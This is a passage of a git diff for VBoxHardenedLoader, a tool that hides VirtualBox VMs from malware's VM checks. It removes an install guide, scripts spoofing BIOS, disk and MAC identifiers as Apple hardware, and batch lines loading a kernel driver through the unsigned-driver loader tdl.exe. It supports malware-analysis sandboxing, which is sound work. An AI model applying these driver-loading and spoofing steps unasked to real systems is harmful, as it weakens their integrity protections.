-tdl.exe tsugumi.sys
-echo Run loader
-pause
-call loader.cmd
-net start vboxdrv
\ No newline at end of file
diff --git a/Binary/install_signed.md b/Binary/install_signed.md
deleted file mode 100644
index 15f2dc7..0000000
--- a/Binary/install_signed.md
+++ /dev/null
@@ -1,204 +0,0 @@
-# Installation guide (for signed loader and driver)
-
-Step by step guide for VirtualBox x64 Hardened (5.1.16+) VM detection mitigation configuring.
-
-Contents:
-
- * Installing VirtualBox
- * Creating VM with required settings
- * Using batch script to apply fake VM system information
- * Loading monitoring driver for load-in-memory VM dll patch
- * Warning: VirtualBox Additions
- * Appendix A: Managing monitoring driver
- * Appendix B: Using EFI VM
- * Appendix C: Uninstalling VirtualBox loader
- * Appendix D: Updating VirtualBox
-
-
-### Step 1. Installing VirtualBox
-
-
-1. Download VirtualBox from official site (https://www.virtualbox.org/wiki/Downloads).
-2. Do clean installation of latest VirtualBox.
- * Clean mean - you must firstly uninstall any other versions of VirtualBox and reboot Windows to complete uninstallation. This ensures that no old VirtualBox files will left in system memory and on disk. Unfortunately VirtualBox setup sometimes can't do complete removal without reboot, so do reboot after uninstall.
-3. Start installation and select VirtualBox components to install as shown on fugure below.
-
-
-### Step 2. Creating VM with required setting
-
-In this example we are installing and configuring VirtualBox on x64 notebook with 6Gb of RAM and 4x Intel Core i7 Haswell CPU running full patch Windows 8.1.
-
-Create a new virtual machine (in this example it will be named "vm0") and configure it in the following way:
-
-
-
-Note: 512 Mb is not requirement, you can adjust or lower this value as you want, but keep in mind - some lame malware attempt to detect VM by available physical memory size, and if its too low - use it as VM detection flag.
-
-Setup Virtual disk
-
-
-
-Note: 64 Gb is not requirement however yet again some lame malware attempt to detect VM by hard disk size, so give it reasonable size.
-
-After VM (vm0 is our case) created, open it setting and do some changes.
-
-#### System
-
-On "Motherboard" tab ensure Enable I/O API is turned on. If you plan to use EFI please read Appendix B: Using EFI VM.
-
-
-
-On "Processor" tab ensure PAE/NX enabled. Also note that your VM must have at least TWO CPUs because again number of processors used by malware to determinate VM execution. So give VM at minimum two processors.
-
-
-
-On "Acceleration" tab set Paravirtualization Interface to "Legacy" and enable VT-x/Nested Paging. The "Default" paravirtualization interface give VM ability to detect VirtualBox hypervisor by "hypervisor present bit" and hypervisor name via cpuid instruction. Switching paravirtualization interface to "Legacy" effectively turns off these malware vm-detect friendly features.
-
-
-
-#### Display
-
-On "Screen" tab disable 3D/2D Acceleration.
-
-
-
-#### Storage
-
-Storage configuration would be looking like that
-
-
-
-You can use IDE controller instead of SATA, but we will be assuming that you use default SATA next.
-
-#### Network
-
-Enable NAT for virtual machine, so you can use FTP like programs to communicate with it and machine will have access to internet (if you have it).
-
-
-
-Once all settings set, press OK button.
-
-### Step 3. Using batch script to apply fake VM system information
-
-Close VirtualBox.
-
-Save https://github.com/hfiref0x/VBoxHardenedLoader/tree/master/Binary folder to your PC, for example we will save it as C:\VBoxLdr and use this directory next in examples. Open command line prompt (Win+R, type cmd, press Enter). Change current directory to VBoxLdr\data directory (type cd C:\VBoxLdr\data, press Enter)
-
-Now important part. Select script to work with it next depending on your VM configuration.
-
-> hidevm_ahci is for VM with SATA/AHCI controller and classical BIOS
-
-> hidevm_ide is for VM with IDE controller and classical BIOS
-
-> hidevm_efiahci is for VM with SATA/AHCI controller and EFI
-
-> hidevm_efiide is for VM with IDE controller and EFI
-
-If you plan to use EFI VM see "Appendix B: Using EFI VM" before doing any further steps.
-
-In our example we created VM without EFI support and with SATA/AHCI controller so we will use hidevm_ahci script. Open it with notepad and change the following lines:
-
-> set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe"
->
-> set vmscfgdir=D:\Virtual\VBOX\Settings\
-
-Here you see two variables used as filepaths below in script, change them to actual locations.
-
-Depending on where your VirtualBox installed place correct path to vboxmanage.exe in vboxman variable. Depending on where you saved Binary folder change it for vmscfgdir variable.
-
-In our example we will leave vboxman as is, because we didn't changed VirtualBox installation path and change D:\Virtual\VBOX\Settings\ to C:\VBoxLdr\data so both lines will look like
-
-> set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe"
->
-> set vmscfgdir=C:\VBoxLdr\data\
-
-Note the backslash at the end of vmscfgdir.
-
-After that save script changes.
-
-Type it in comand line prompt and add your VM name as parameter, e.g. in our case:
-
-
-
-Run it by pressing Enter. This will setup additional configuration for your VM.
-
-Do not run any VM, as it is not ready yet.
-
-### Step 4. Loading monitoring driver for load-in-memory VM dll patch
-
-Close VirtualBox if it opened.
-
-Open elevated command line prompt. Run cmd.exe as admin and switch current directory to C:\VBoxLdr (or where you saved Binary folder).
-
-##### RED ALERT
-> Both driver and loader MUST be signed with valid certificate allowing loading code to kernel mode. Note that signed version of monitoring driver is INCOMPATIBLE with TDL and attempt to load such driver using TDL will result in BSOD. Signed loader MUST operate with signed driver and unsigned loader MUST operate with unsigned driver.
-
-Run loader.exe without parameters to load monitoring driver and configure it.
-
-
-
-Note: that on screenshot use different directory other than in our guide. Upon successful execution you will see here your directory name of course.
-
-Done, monitoring driver loaded and configured. Monitoring driver registerd in system as kernel mode service so it can be managed by standard Windows commands like "net" or "sc", for more information see "Appendix A: Managing monitoring driver"
-
-
-## Warning: VirtualBox Additions
-
-Do not install VirtualBox Additions! This will ruin everything and there is NO workaround for this.
-
-### Appendix A: Managing monitoring driver
-
-List of available loader command on screenshot below:
-
-
-
-Loader provide command to stop monitoring without unloading monitoring driver. To do this run loader elevated with /s switch. E.g. loader.exe /s, re-run loader without parameters to reenable monitoring.
-
-Once first time installed by loader monitoring driver can be managed by "net" command.
-
-Use
->net start tsugumi
->
->net stop tsugumi
-
-to start and stop monitoring driver respectively. The "sc" tool will work too.
-
-### Appendix B: Using EFI VM
-
-There are two ways to set your patched/custom EFI ROM for EFI VM.
-
-##### 1. Replace VBoxEFI64.fd with patched
-During Step 3.
-
-* Make backup copy of original `VBoxEFI64.fd` in VirtualBox directory somewhere;
-* Replace `VBoxEFI64.fd` in VirtualBox directory with it patched version from VBoxLdr\data directory. Select proper version of file and then rename it to `VBoxEFI64.fd` (e.g. you have installed 5.1.18 then select `VBoxEFI64_5.1.18.fd`);
-* Use hidevm_efiahci (AHCI controller mode) or hidevm_efiide (IDE controller mode) for your EFI VM.
-
-##### 2. Use vboxmanage setextradata
-It is the simple way, without any file replacing:
-* Configure VM to use alternative EFI ROM with help of VBoxManage.
-
-*vboxmanage setextradata vmname "VBoxInternal/Devices/efi/0/Config/EfiRom" full_path_to_your_patched_efirom*
-
-e.g. *vboxmanage setextradata vm01 "VBoxInternal/Devices/efi/0/Config/EfiRom" C:\VM\PinkiPie.fd*
-
-To automate this you can add the following string to EFI vm configuration scripts
-*%vboxman% setextradata "%1" "VBoxInternal/Devices/efi/0/Config/EfiRom" full_path_to_your_patched_efirom*
-
-Note that some VirtualBox versions might not support this.
-
-### Appendix C: Uninstalling VirtualBox loader
-
-If monitoring driver loaded - reboot Windows. Delete VBoxLdr folder. Open regedit and delete keys
-
->HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tsugumi
->
->HKEY_LOCAL_MACHINE\SOFTWARE\Tsugumi
-
-if present.
-
-If you used patched EFI module then restore `VBoxEFI64.fd` file from backup otherwise VirtualBox will be unable to work with EFI VM's.
-
-### Appendix D: Updating VirtualBox
-
-Scenario: you decided update VirtualBox without clean reinstall and rebooting your PC. Will the loader work with new version? Yes it will, but you need re-run loader.exe in elevated command prompt to update patch information for new version of VirtualBox dynamic link library VBoxDD.dll. Close VirtualBox if it opened. Open command line prompt elevated, change current directory to VBoxLdr and run loader.exe from it.
diff --git a/Binary/linux.md b/Binary/linux.md
index 55c32d0..6d1b26e 100644
--- a/Binary/linux.md
+++ b/Binary/linux.md
@@ -2,16 +2,12 @@ Although this loader was initially created for use with Windows VirtualBox versi
Patching VirtualBox on Linux
-http://www.kernelmode.info/forum/viewtopic.php?p=29627#p29627
+https://www.kernelmode.info/forum/viewtopicd7bf.html?f=11&t=3478&start=100#p29030
More vboxmanage converted scripts examples
https://github.com/hfiref0x/VBoxHardenedLoader/issues/9
-Post about VirtualBox recompilation
-
-http://www.kernelmode.info/forum/viewtopic.php?p=29030#p29030
-
Example patched files for 5.1.16 deb package version
-http://www.kernelmode.info/forum/viewtopic.php?p=29627#p29632
+https://www.kernelmode.info/forum/viewtopic5ec6-2.html?f=11&t=3478&start=150#p29632
\ No newline at end of file
diff --git a/Binary/linux/ACPI-DSDT.bin b/Binary/linux/ACPI-DSDT.bin
deleted file mode 100644
index 9337f9e..0000000
Binary files a/Binary/linux/ACPI-DSDT.bin and /dev/null differ
diff --git a/Binary/linux/ACPI-SSDT1.bin b/Binary/linux/ACPI-SSDT1.bin
deleted file mode 100644
index 76f54cd..0000000
Binary files a/Binary/linux/ACPI-SSDT1.bin and /dev/null differ
diff --git a/Binary/linux/modifyvm-BIOS b/Binary/linux/modifyvm-BIOS
deleted file mode 100644
index d7fed5e..0000000
--- a/Binary/linux/modifyvm-BIOS
+++ /dev/null
@@ -1,51 +0,0 @@
-#!/bin/sh
-vboxmanage setextradata $1 "VBoxInternal/CPUM/EnableHVP" 0
-
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor" "Apple Inc."
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate" "08/10/13"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMajor" "5"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMinor" "9"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMajor" "1"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMinor" "0"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVendor" "Apple Inc."
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiSystemProduct" "MacBook5,2"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVersion" "1.0"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSerial" "CSN12345678901234567"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSKU" "FM550EA#ACB"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiSystemFamily" "Ultrabook"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiSystemUuid" "B5FA3000-9403-81E0-3ADA-F46D045CB676"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVendor" "Apple Inc."
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBoardProduct" "Mac-F22788AA"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVersion" "3.0"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBoardSerial" "BSN12345678901234567"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBoardAssetTag" "Base Board Asset Tag#"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBoardLocInChass" "Board Loc In"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiBoardBoardType" 10
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVendor" "Apple Inc."
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiChassisType" 10
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVersion" "Mac-F22788AA"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiChassisSerial" "CSN12345678901234567"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiChassisAssetTag" "Apple"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxVer" "Extended version info: 1.00.00"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxRev" "Extended revision info: 1A"
-
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port0/ModelNumber" "Hitachi HTS543232A7A384"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port0/FirmwareRevision" "ES2OA60W"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port0/SerialNumber" "2E3024L1T2V9KA"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/ModelNumber" "Slimtype DVD A DS8A8SH"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/FirmwareRevision" "KAA2"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/SerialNumber" "ABCDEF0123456789"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIVendorId" "Slimtype"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIProductId" "DVD A DS8A8SH"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIRevision" "KAA2"
-
-vboxmanage setextradata $1 "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "APPLE"
-vboxmanage setextradata $1 "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "/home/vmadmin/DATA/WHTMP/vm/ACPI-DSDT.bin"
-vboxmanage setextradata $1 "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "/home/vmadmin/DATA/WHTMP/vm/ACPI-SSDT1.bin"
-vboxmanage setextradata $1 "VBoxInternal/Devices/vga/0/Config/BiosRom" "/home/vmadmin/DATA/WHTMP/vm/videorom.bin"
-vboxmanage setextradata $1 "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "/home/vmadmin/DATA/WHTMP/vm/pcbios.bin"
-vboxmanage modifyvm $1 --macaddress1 6CF0491A6E83
-
-vboxmanage modifyvm $1 --bioslogoimagepath "/home/vmadmin/DATA/WHTMP/vm/splash.bmp"
-
diff --git a/Binary/linux/modifyvm-EFI b/Binary/linux/modifyvm-EFI
deleted file mode 100644
index 65bb491..0000000
--- a/Binary/linux/modifyvm-EFI
+++ /dev/null
@@ -1,50 +0,0 @@
-#!/bin/sh
-vboxmanage setextradata $1 "VBoxInternal/CPUM/EnableHVP" 0
-
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBIOSVendor" "Apple Inc."
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseDate" "08/10/13"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseMajor" "5"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBIOSReleaseMinor" "9"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBIOSFirmwareMajor" "1"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBIOSFirmwareMinor" "0"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiSystemVendor" "Apple Inc."
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "MacBook5,2"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiSystemSerial" "CSN12345678901234567"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiSystemSKU" "FM550EA#ACB"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiSystemFamily" "Ultrabook"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiSystemUuid" "B5FA3000-9403-81E0-3ADA-F46D045CB676"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBoardVendor" "Apple Inc."
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Mac-F22788AA"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBoardVersion" "3.0"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBoardSerial" "BSN12345678901234567"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBoardAssetTag" "Base Board Asset Tag#"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBoardLocInChass" "Board Loc In"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiBoardBoardType" 10
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiChassisVendor" "Apple Inc."
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiChassisType" 10
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiChassisVersion" "Mac-F22788AA"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiChassisSerial" "CSN12345678901234567"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiChassisAssetTag" "Apple"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiOEMVBoxVer" "Extended version info: 1.00.00"
-vboxmanage setextradata $1 "VBoxInternal/Devices/efi/0/Config/DmiOEMVBoxRev" "Extended revision info: 1A"
-
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port0/ModelNumber" "Hitachi HTS543232A7A384"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port0/FirmwareRevision" "ES2OA60W"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port0/SerialNumber" "2E3024L1T2V9KA"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/ModelNumber" "Slimtype DVD A DS8A8SH"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/FirmwareRevision" "KAA2"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/SerialNumber" "ABCDEF0123456789"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIVendorId" "Slimtype"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIProductId" "DVD A DS8A8SH"
-vboxmanage setextradata $1 "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIRevision" "KAA2"
-
-vboxmanage setextradata $1 "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "APPLE"
-vboxmanage setextradata $1 "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "/home/vmadmin/DATA/WHTMP/vm/ACPI-DSDT.bin"
-vboxmanage setextradata $1 "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "/home/vmadmin/DATA/WHTMP/vm/ACPI-SSDT1.bin"
-vboxmanage setextradata $1 "VBoxInternal/Devices/vga/0/Config/BiosRom" "/home/vmadmin/DATA/WHTMP/vm/videorom.bin"
-vboxmanage modifyvm $1 --macaddress1 6CF0491A6E83
-
-vboxmanage modifyvm $1 --bioslogoimagepath "/home/vmadmin/DATA/WHTMP/vm/splash.bmp"
-
diff --git a/Binary/linux/pcbios.bin b/Binary/linux/pcbios.bin
deleted file mode 100644
index 8c57720..0000000
Binary files a/Binary/linux/pcbios.bin and /dev/null differ
diff --git a/Binary/linux/pxerom.bin b/Binary/linux/pxerom.bin
deleted file mode 100644
index 15cb3d5..0000000
Binary files a/Binary/linux/pxerom.bin and /dev/null differ
diff --git a/Binary/linux/readme.txt b/Binary/linux/readme.txt
deleted file mode 100644
index bbb73e0..0000000
--- a/Binary/linux/readme.txt
+++ /dev/null
@@ -1 +0,0 @@
-https://github.com/hfiref0x/VBoxHardenedLoader/blob/master/Binary/linux.md
\ No newline at end of file
diff --git a/Binary/linux/splash.bmp b/Binary/linux/splash.bmp
deleted file mode 100644
index d2fad1a..0000000
Binary files a/Binary/linux/splash.bmp and /dev/null differ
diff --git a/Binary/linux/videorom.bin b/Binary/linux/videorom.bin
deleted file mode 100644
index fa84812..0000000
Binary files a/Binary/linux/videorom.bin and /dev/null differ
diff --git a/Binary/loader.cmd b/Binary/loader.cmd
deleted file mode 100644
index 7944bbb..0000000
--- a/Binary/loader.cmd
+++ /dev/null
@@ -1,4 +0,0 @@
-REM Append full patch to loader.exe and run this batch file elevated
-@echo
-echo Running loader
-loader.exe
diff --git a/Binary/loader.exe b/Binary/loader.exe
index 18fef99..08d4f01 100644
Binary files a/Binary/loader.exe and b/Binary/loader.exe differ
diff --git a/Binary/patchgen/kasumi.exe b/Binary/patchgen/kasumi.exe
deleted file mode 100644
index 821162b..0000000
Binary files a/Binary/patchgen/kasumi.exe and /dev/null differ
diff --git a/Binary/support.txt b/Binary/support.txt
new file mode 100644
index 0000000..472fc98
--- /dev/null
+++ b/Binary/support.txt
@@ -0,0 +1,3 @@
+# Support and donations
+
+VBoxHardenedLoader is Free Software and is made available free of charge. Your donation, which is purely optional, supports project development and maintaining. If you like the software, you can consider donation which you can do anonymously using the following BTC address: 3DU68VrwZYHVSYXenQMG123utkYrFGms3b
diff --git a/Binary/tdl.exe b/Binary/tdl.exe
deleted file mode 100644
index 0d8cfef..0000000
Binary files a/Binary/tdl.exe and /dev/null differ
diff --git a/LICENSE.md b/LICENSE.md
index 18d85d9..9f810d8 100644
--- a/LICENSE.md
+++ b/LICENSE.md
@@ -1,4 +1,4 @@
-Copyright (c) 2014 - 2018, VBoxHardenedLoader authors
+Copyright (c) 2014 - 2020, VBoxHardenedLoader authors
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
diff --git a/README.md b/README.md
index 88a5943..521ea32 100644
--- a/README.md
+++ b/README.md
@@ -2,21 +2,20 @@
# VirtualBox Hardened Loader
## VirtualBox Hardened VM detection mitigation loader
-For step by step guide further info see
-
-https://github.com/hfiref0x/VBoxHardenedLoader/blob/master/Binary/install.md
-
-If you compiled signed version of loader and driver
+# System Requirements
-https://github.com/hfiref0x/VBoxHardenedLoader/blob/master/Binary/install_signed.md
++ x64 Windows 7/8/8.1/10;
++ VirtualBox 6.1.2 and later versions;
++ Administrative privilege is required.
-# System Requirements
+WARNING: This loader is incompatible with any VirtualBox below 6.1.2.
-x64 Windows 7/8/8.1/10;
+For version below VirtualBox 6.1.2 please use older release of this loader.
-VirtualBox 6.0.0 and later versions.
+More about key changes in loader version 2.0 you can read here https://swapcontext.blogspot.com/2020/02/vboxhardenedloader-v2.html
-For version below VirtualBox 6.0 please use older release of this loader.
++ For versions 6.0.x use loader version 1.10.0
+(https://github.com/hfiref0x/VBoxHardenedLoader/releases/tag/v1.10.0)
+ For versions 5.2.x use loader version 1.9.0
(https://github.com/hfiref0x/VBoxHardenedLoader/releases/tag/v1.9.0)
@@ -27,41 +26,29 @@ For version below VirtualBox 6.0 please use older release of this loader.
+ For versions 5.0.0, 5.0.2, 5.0.8, 5.0.10, 5.0.12 use loader version 1.7.1
(https://github.com/hfiref0x/VBoxHardenedLoader/releases/tag/v1.7.1)
-Loader designed only for x64 Windows.
-
-Administrative privilege is required.
-
-# Warning
-Binary files (ACPI tables, BIOS roms), batch scripts from loader version 1.9+ are NOT compatible with VirtualBox 5.1 and below.
-
-# Oracle bug warning for VirtualBox 6.0.0
-VirtualBox version 6.0.0 contain a bug that causes any EFI enabled guest to show black screen with any type of virtual display adapter other than VBoxVGA which is _not default_ setting (except the case when VM is created for old OS variants). If you want set the EFI option for guest, you should also go to Display settings and change video adapter type to VBoxVGA manually.
-
-# Installation and use
-For unsingned loader version (this is default version shipped on github)
-+ See README.txt in Binary directory for more info.
+# Installation and use guide
-For singed loader version
-+ See README_SIGNED.txt in Binary directory for more info.
+https://github.com/hfiref0x/VBoxHardenedLoader/blob/master/Binary/howto.md
# Build
Project comes with full source code.
In order to build from source you need:
-1) Microsoft Visual Studio 2013 U4 and/or Visual Studio 2015/2017 for loader build.
-2) Windows Driver Kit 8.1 U1 and later versions for driver build.
+1) Microsoft Visual Studio 2019 for loader build.
+2) Windows Driver Kit 8.1/10 and later versions for driver build.
## Instructions
* Select Platform ToolSet first for project in solution you want to build (Project->Properties->General):
* v120 for Visual Studio 2013;
* v140 for Visual Studio 2015;
- * v141 for Visual Studio 2017.
+ * v141 for Visual Studio 2017;
+ * v142 for Visual Studio 2019.
* For v140 and above set Target Platform Version (Project->Properties->General):
- * If v140 then select 8.1 (Note that Windows 8.1 SDK must be installed);
- * If v141 then select 10.0.17763.0 (Note that Windows 10.0.17763 SDK must be installed).
+ * If v140 then select 8.1;
+ * If v141/v142 then select 10.
# Project Contents
@@ -72,27 +59,22 @@ Purpose: patch VirtualBox dlls in runtime.
**Zekamashi - application, x64**
-Purpose: set registry patch data for Tsugumi driver, notify monitoring driver about patch data change, stop monitoring. Controls driver behavior by sending Tsugumi requests from loader command line. Type loader /? in command line to view built-in help about supported commands and their syntax.
+Purpose: load Tsugumi monitoring driver, stop monitoring. Type loader /? in command line to view built-in help about supported commands and their syntax.
-Since 1.8 version loader has integrated patch generator and it will attempt to generate patch table for currently installed VirtualBox version.
-**Kasumi - application, x64**
-
-Purpose: auxiliary utiliy to generate patch tables from VirtualBox VBoxDD dlls, generated table then can be used as input file to loader (Zekamashi).
-
-> **Usage:** kasumi vboxdd_filename, for example: kasumi C:\Program Files\Oracle\VirtualBox\VBoxDD.dll
-
-Not required for VBoxHardenedLoader work. Since 1.8 version integrated to Zekamashi loader and works automatically.
+# Linux support
+https://github.com/hfiref0x/VBoxHardenedLoader/blob/master/Binary/linux.md
-# Code Signing
-See CodeSigning.txt in Source directory for more info.
+# Support and donations
-# Linux support
+VBoxHardenedLoader is Free Software and is made available free of charge.
+Your donation, which is purely optional, supports project development and maintaining.
+If you like the software, you can consider donation which you can do anonymously using the following BTC address
-https://github.com/hfiref0x/VBoxHardenedLoader/blob/master/Binary/linux.md
+* 3DU68VrwZYHVSYXenQMG123utkYrFGms3b
# Authors
-(c) 2014 - 2019 VBoxHardenedLoader Project
+(c) 2014 - 2020 VBoxHardenedLoader Project
diff --git a/Source/CodeSigning.txt b/Source/CodeSigning.txt
deleted file mode 100644
index c15a6b4..0000000
--- a/Source/CodeSigning.txt
+++ /dev/null
@@ -1,28 +0,0 @@
-Both loader and monitor driver projects support code signing.
-
-To compile code signing friendly version use "ReleaseSigned" configuration.
-
-The difference with "Release" configuration is in included Post Build Event for signing, additional linker option /INTEGRITYCHECK and identifier _SIGNED_BUILD is set which is controlling some code behavior in loader and driver.
-
-More info https://msdn.microsoft.com/en-us/library/dn195769.aspx
-
-Certificate for kernel mode code signing required.
-
-To customize/configure code signing process go to Project Properties -> Build Events -> Post Build Event.
-
-Example of code signing batch file
-"signtool.exe" sign /sha1 CERTIFICATE_HASH /ac CERTIFICATE_PATH /ph /fd SHA256 /v /tr http://sha256timestamp.ws.symantec.com/sha256/timestamp %1
-
-where %1 file to be signed
-
-
-Warning
-
-Use signed driver with signed loader and vise versa.
-Signed version of Tsugumi is incompatible with unsigned loader and TDL.
-Unsigned version of Tsugumi is incompatible with signed loader.
-
-Using unsigned driver (loaded by TDL) in Windows 10 is unsafe because of Windows 10 TH2 Kernel Patch Protection (PatchGuard) improvements.
-
-Last update
-01/Feb/17
diff --git a/Source/Kasumi/VBoxPatchGen.sln b/Source/Kasumi/VBoxPatchGen.sln
deleted file mode 100644
index e587ffe..0000000
--- a/Source/Kasumi/VBoxPatchGen.sln
+++ /dev/null
@@ -1,22 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio 14
-VisualStudioVersion = 14.0.25420.1
-MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Kasumi", "VBoxPatchGen\VBoxPatchGen.vcxproj", "{F706DA8E-B4E2-4E2B-A47E-317C7408303D}"
-EndProject
-Global
- GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|x64 = Debug|x64
- Release|x64 = Release|x64
- EndGlobalSection
- GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {F706DA8E-B4E2-4E2B-A47E-317C7408303D}.Debug|x64.ActiveCfg = Debug|x64
- {F706DA8E-B4E2-4E2B-A47E-317C7408303D}.Debug|x64.Build.0 = Debug|x64
- {F706DA8E-B4E2-4E2B-A47E-317C7408303D}.Release|x64.ActiveCfg = Release|x64
- {F706DA8E-B4E2-4E2B-A47E-317C7408303D}.Release|x64.Build.0 = Release|x64
- EndGlobalSection
- GlobalSection(SolutionProperties) = preSolution
- HideSolutionNode = FALSE
- EndGlobalSection
-EndGlobal
diff --git a/Source/Kasumi/VBoxPatchGen/Resource.rc b/Source/Kasumi/VBoxPatchGen/Resource.rc
deleted file mode 100644
index 2db7819..0000000
Binary files a/Source/Kasumi/VBoxPatchGen/Resource.rc and /dev/null differ
diff --git a/Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj.filters b/Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj.filters
deleted file mode 100644
index 06a35cf..0000000
--- a/Source/Kasumi/VBoxPatchGen/VBoxPatchGen.vcxproj.filters
+++ /dev/null
@@ -1,77 +0,0 @@
-
-
-
-
- {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
